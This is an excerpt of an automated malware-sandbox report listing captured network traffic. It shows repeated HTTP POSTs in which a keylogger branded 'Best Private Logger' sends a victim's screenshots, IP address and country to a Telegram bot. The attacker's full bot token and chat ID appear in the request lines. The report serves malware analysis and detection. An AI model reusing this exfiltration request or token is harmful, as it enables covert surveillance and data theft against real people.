                Source: global trafficHTTP traffic detected: POST /bot6423275328:AAEFALkc3yNmgwbyoG03lPKwIaT4LiLSn38/sendDocument?chat_id=5088754730&caption=user%20/%20SCREENSHOT%20/%208.46.123.189%0D%0A%0D%0A***********************************************************%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20_%20%20%20%20___%20%20%20___%20%20___%20___%20___%20%20%20%20*%0D%0A*%20%20%20%20%20%20Best%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C%20%20/%20_%20%5C%20/%20__%7C/%20__%7C%20__%7C%20_%20%5C%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C_%7C%20(_)%20%7C%20(_%20%7C%20(_%20%7C%20_%7C%7C%20%20%20/%20%20%20*%0D%0A*%20%20%20%20%20%20Private%20%20-%20-%20-%20-%3E%20%20%7C____%5C___/%20%5C___%7C%5C___%7C___%7C_%7C_%5C%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A***********************************************************%20%0D%0A%0D%0A%0D%0A==========PC%20INFO==========%0D%0AClient%20Name:724536%0D%0AFullDate:%2009/01/2025%20-%2005:37:53%0D%0AIP:%208.46.123.189%0D%0ACountry:%20United%20States%0D%0A==========PC%20INFO========== HTTP/1.1Content-Type: multipart/form-data; boundary================8dd33f222aad1daHost: api.telegram.orgContent-Length: 695477Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: POST /bot6423275328:AAEFALkc3yNmgwbyoG03lPKwIaT4LiLSn38/sendDocument?chat_id=5088754730&caption=user%20/%20SCREENSHOT%20/%208.46.123.189%0D%0A%0D%0A***********************************************************%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20_%20%20%20%20___%20%20%20___%20%20___%20___%20___%20%20%20%20*%0D%0A*%20%20%20%20%20%20Best%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C%20%20/%20_%20%5C%20/%20__%7C/%20__%7C%20__%7C%20_%20%5C%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C_%7C%20(_)%20%7C%20(_%20%7C%20(_%20%7C%20_%7C%7C%20%20%20/%20%20%20*%0D%0A*%20%20%20%20%20%20Private%20%20-%20-%20-%20-%3E%20%20%7C____%5C___/%20%5C___%7C%5C___%7C___%7C_%7C_%5C%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A***********************************************************%20%0D%0A%0D%0A%0D%0A==========PC%20INFO==========%0D%0AClient%20Name:724536%0D%0AFullDate:%2009/01/2025%20-%2005:37:53%0D%0AIP:%208.46.123.189%0D%0ACountry:%20United%20States%0D%0A==========PC%20INFO========== HTTP/1.1Content-Type: multipart/form-data; boundary================8dd34452f8ffdffHost: api.telegram.orgContent-Length: 695479Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: POST /bot6423275328:AAEFALkc3yNmgwbyoG03lPKwIaT4LiLSn38/sendDocument?chat_id=5088754730&caption=user%20/%20SCREENSHOT%20/%208.46.123.189%0D%0A%0D%0A***********************************************************%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20_%20%20%20%20___%20%20%20___%20%20___%20___%20___%20%20%20%20*%0D%0A*%20%20%20%20%20%20Best%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C%20%20/%20_%20%5C%20/%20__%7C/%20__%7C%20__%7C%20_%20%5C%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C_%7C%20(_)%20%7C%20(_%20%7C%20(_%20%7C%20_%7C%7C%20%20%20/%20%20%20*%0D%0A*%20%20%20%20%20%20Private%20%20-%20-%20-%20-%3E%20%20%7C____%5C___/%20%5C___%7C%5C___%7C___%7C_%7C_%5C%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A***********************************************************%20%0D%0A%0D%0A%0D%0A==========PC%20INFO==========%0D%0AClient%20Name:724536%0D%0AFullDate:%2009/01/2025%20-%2005:37:53%0D%0AIP:%208.46.123.189%0D%0ACountry:%20United%20States%0D%0A==========PC%20INFO========== HTTP/1.1Content-Type: multipart/form-data; boundary================8dd34a0b1020d5fHost: api.telegram.orgContent-Length: 695479Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: POST /bot6423275328:AAEFALkc3yNmgwbyoG03lPKwIaT4LiLSn38/sendDocument?chat_id=5088754730&caption=user%20/%20SCREENSHOT%20/%208.46.123.189%0D%0A%0D%0A***********************************************************%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20_%20%20%20%20___%20%20%20___%20%20___%20___%20___%20%20%20%20*%0D%0A*%20%20%20%20%20%20Best%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C%20%20/%20_%20%5C%20/%20__%7C/%20__%7C%20__%7C%20_%20%5C%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C_%7C%20(_)%20%7C%20(_%20%7C%20(_%20%7C%20_%7C%7C%20%20%20/%20%20%20*%0D%0A*%20%20%20%20%20%20Private%20%20-%20-%20-%20-%3E%20%20%7C____%5C___/%20%5C___%7C%5C___%7C___%7C_%7C_%5C%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A***********************************************************%20%0D%0A%0D%0A%0D%0A==========PC%20INFO==========%0D%0AClient%20Name:724536%0D%0AFullDate:%2009/01/2025%20-%2005:37:53%0D%0AIP:%208.46.123.189%0D%0ACountry:%20United%20States%0D%0A==========PC%20INFO========== HTTP/1.1Content-Type: multipart/form-data; boundary================8dd352dd751ac8bHost: api.telegram.orgContent-Length: 695479Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: POST /bot6423275328:AAEFALkc3yNmgwbyoG03lPKwIaT4LiLSn38/sendDocument?chat_id=5088754730&caption=user%20/%20SCREENSHOT%20/%208.46.123.189%0D%0A%0D%0A***********************************************************%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20_%20%20%20%20___%20%20%20___%20%20___%20___%20___%20%20%20%20*%0D%0A*%20%20%20%20%20%20Best%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C%20%20/%20_%20%5C%20/%20__%7C/%20__%7C%20__%7C%20_%20%5C%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C_%7C%20(_)%20%7C%20(_%20%7C%20(_%20%7C%20_%7C%7C%20%20%20/%20%20%20*%0D%0A*%20%20%20%20%20%20Private%20%20-%20-%20-%20-%3E%20%20%7C____%5C___/%20%5C___%7C%5C___%7C___%7C_%7C_%5C%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A***********************************************************%20%0D%0A%0D%0A%0D%0A==========PC%20INFO==========%0D%0AClient%20Name:724536%0D%0AFullDate:%2009/01/2025%20-%2005:37:53%0D%0AIP:%208.46.123.189%0D%0ACountry:%20United%20States%0D%0A==========PC%20INFO========== HTTP/1.1Content-Type: multipart/form-data; boundary================8dd36a9863e4759Host: api.telegram.orgContent-Length: 695479Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: POST /bot6423275328:AAEFALkc3yNmgwbyoG03lPKwIaT4LiLSn38/sendDocument?chat_id=5088754730&caption=user%20/%20SCREENSHOT%20/%208.46.123.189%0D%0A%0D%0A***********************************************************%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20_%20%20%20%20___%20%20%20___%20%20___%20___%20___%20%20%20%20*%0D%0A*%20%20%20%20%20%20Best%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C%20%20/%20_%20%5C%20/%20__%7C/%20__%7C%20__%7C%20_%20%5C%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C_%7C%20(_)%20%7C%20(_%20%7C%20(_%20%7C%20_%7C%7C%20%20%20/%20%20%20*%0D%0A*%20%20%20%20%20%20Private%20%20-%20-%20-%20-%3E%20%20%7C____%5C___/%20%5C___%7C%5C___%7C___%7C_%7C_%5C%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A***********************************************************%20%0D%0A%0D%0A%0D%0A==========PC%20INFO==========%0D%0AClient%20Name:724536%0D%0AFullDate:%2009/01/2025%20-%2005:37:53%0D%0AIP:%208.46.123.189%0D%0ACountry:%20United%20States%0D%0A==========PC%20INFO========== HTTP/1.1Content-Type: multipart/form-data; boundary================8dd38dbda814e8dHost: api.telegram.orgContent-Length: 695479Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: POST /bot6423275328:AAEFALkc3yNmgwbyoG03lPKwIaT4LiLSn38/sendDocument?chat_id=5088754730&caption=user%20/%20SCREENSHOT%20/%208.46.123.189%0D%0A%0D%0A***********************************************************%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20_%20%20%20%20___%20%20%20___%20%20___%20___%20___%20%20%20%20*%0D%0A*%20%20%20%20%20%20Best%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C%20%20/%20_%20%5C%20/%20__%7C/%20__%7C%20__%7C%20_%20%5C%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C_%7C%20(_)%20%7C%20(_%20%7C%20(_%20%7C%20_%7C%7C%20%20%20/%20%20%20*%0D%0A*%20%20%20%20%20%20Private%20%20-%20-%20-%20-%3E%20%20%7C____%5C___/%20%5C___%7C%5C___%7C___%7C_%7C_%5C%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A***********************************************************%20%0D%0A%0D%0A%0D%0A==========PC%20INFO==========%0D%0AClient%20Name:724536%0D%0AFullDate:%2009/01/2025%20-%2005:37:53%0D%0AIP:%208.46.123.189%0D%0ACountry:%20United%20States%0D%0A==========PC%20INFO========== HTTP/1.1Content-Type: multipart/form-data; boundary================8dd3a59757f29adHost: api.telegram.orgContent-Length: 695479Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: POST /bot6423275328:AAEFALkc3yNmgwbyoG03lPKwIaT4LiLSn38/sendDocument?chat_id=5088754730&caption=user%20/%20SCREENSHOT%20/%208.46.123.189%0D%0A%0D%0A***********************************************************%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20_%20%20%20%20___%20%20%20___%20%20___%20___%20___%20%20%20%20*%0D%0A*%20%20%20%20%20%20Best%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C%20%20/%20_%20%5C%20/%20__%7C/%20__%7C%20__%7C%20_%20%5C%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C_%7C%20(_)%20%7C%20(_%20%7C%20(_%20%7C%20_%7C%7C%20%20%20/%20%20%20*%0D%0A*%20%20%20%20%20%20Private%20%20-%20-%20-%20-%3E%20%20%7C____%5C___/%20%5C___%7C%5C___%7C___%7C_%7C_%5C%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A***********************************************************%20%0D%0A%0D%0A%0D%0A==========PC%20INFO==========%0D%0AClient%20Name:724536%0D%0AFullDate:%2009/01/2025%20-%2005:37:53%0D%0AIP:%208.46.123.189%0D%0ACountry:%20United%20States%0D%0A==========PC%20INFO========== HTTP/1.1Content-Type: multipart/form-data; boundary================8dd3bdbb7a119f5Host: api.telegram.orgContent-Length: 695479Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: POST /bot6423275328:AAEFALkc3yNmgwbyoG03lPKwIaT4LiLSn38/sendDocument?chat_id=5088754730&caption=user%20/%20SCREENSHOT%20/%208.46.123.189%0D%0A%0D%0A***********************************************************%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20_%20%20%20%20___%20%20%20___%20%20___%20___%20___%20%20%20%20*%0D%0A*%20%20%20%20%20%20Best%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C%20%20/%20_%20%5C%20/%20__%7C/%20__%7C%20__%7C%20_%20%5C%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C_%7C%20(_)%20%7C%20(_%20%7C%20(_%20%7C%20_%7C%7C%20%20%20/%20%20%20*%0D%0A*%20%20%20%20%20%20Private%20%20-%20-%20-%20-%3E%20%20%7C____%5C___/%20%5C___%7C%5C___%7C___%7C_%7C_%5C%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A***********************************************************%20%0D%0A%0D%0A%0D%0A==========PC%20INFO==========%0D%0AClient%20Name:724536%0D%0AFullDate:%2009/01/2025%20-%2005:37:53%0D%0AIP:%208.46.123.189%0D%0ACountry:%20United%20States%0D%0A==========PC%20INFO========== HTTP/1.1Content-Type: multipart/form-data; boundary================8dd3d05872645cbHost: api.telegram.orgContent-Length: 696547Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: POST /bot6423275328:AAEFALkc3yNmgwbyoG03lPKwIaT4LiLSn38/sendDocument?chat_id=5088754730&caption=user%20/%20SCREENSHOT%20/%208.46.123.189%0D%0A%0D%0A***********************************************************%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20_%20%20%20%20___%20%20%20___%20%20___%20___%20___%20%20%20%20*%0D%0A*%20%20%20%20%20%20Best%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C%20%20/%20_%20%5C%20/%20__%7C/%20__%7C%20__%7C%20_%20%5C%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C_%7C%20(_)%20%7C%20(_%20%7C%20(_%20%7C%20_%7C%7C%20%20%20/%20%20%20*%0D%0A*%20%20%20%20%20%20Private%20%20-%20-%20-%20-%3E%20%20%7C____%5C___/%20%5C___%7C%5C___%7C___%7C_%7C_%5C%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A***********************************************************%20%0D%0A%0D%0A%0D%0A==========PC%20INFO==========%0D%0AClient%20Name:724536%0D%0AFullDate:%2009/01/2025%20-%2005:37:53%0D%0AIP:%208.46.123.189%0D%0ACountry:%20United%20States%0D%0A==========PC%20INFO========== HTTP/1.1Content-Type: multipart/form-data; boundary================8dd55af8716888eHost: api.telegram.orgContent-Length: 687751Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: POST /bot6423275328:AAEFALkc3yNmgwbyoG03lPKwIaT4LiLSn38/sendDocument?chat_id=5088754730&caption=user%20/%20SCREENSHOT%20/%208.46.123.189%0D%0A%0D%0A***********************************************************%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20_%20%20%20%20___%20%20%20___%20%20___%20___%20___%20%20%20%20*%0D%0A*%20%20%20%20%20%20Best%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C%20%20/%20_%20%5C%20/%20__%7C/%20__%7C%20__%7C%20_%20%5C%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C_%7C%20(_)%20%7C%20(_%20%7C%20(_%20%7C%20_%7C%7C%20%20%20/%20%20%20*%0D%0A*%20%20%20%20%20%20Private%20%20-%20-%20-%20-%3E%20%20%7C____%5C___/%20%5C___%7C%5C___%7C___%7C_%7C_%5C%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A***********************************************************%20%0D%0A%0D%0A%0D%0A==========PC%20INFO==========%0D%0AClient%20Name:724536%0D%0AFullDate:%2009/01/2025%20-%2005:37:53%0D%0AIP:%208.46.123.189%0D%0ACountry:%20United%20States%0D%0A==========PC%20INFO========== HTTP/1.1Content-Type: multipart/form-data; boundary================8ddd539019124f7Host: api.telegram.orgContent-Length: 695479Connection: Keep-Alive
                Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                Source: Joe Sandbox ViewIP Address: 104.21.112.1 104.21.112.1
                Source: Joe Sandbox ViewIP Address: 132.226.247.73 132.226.247.73
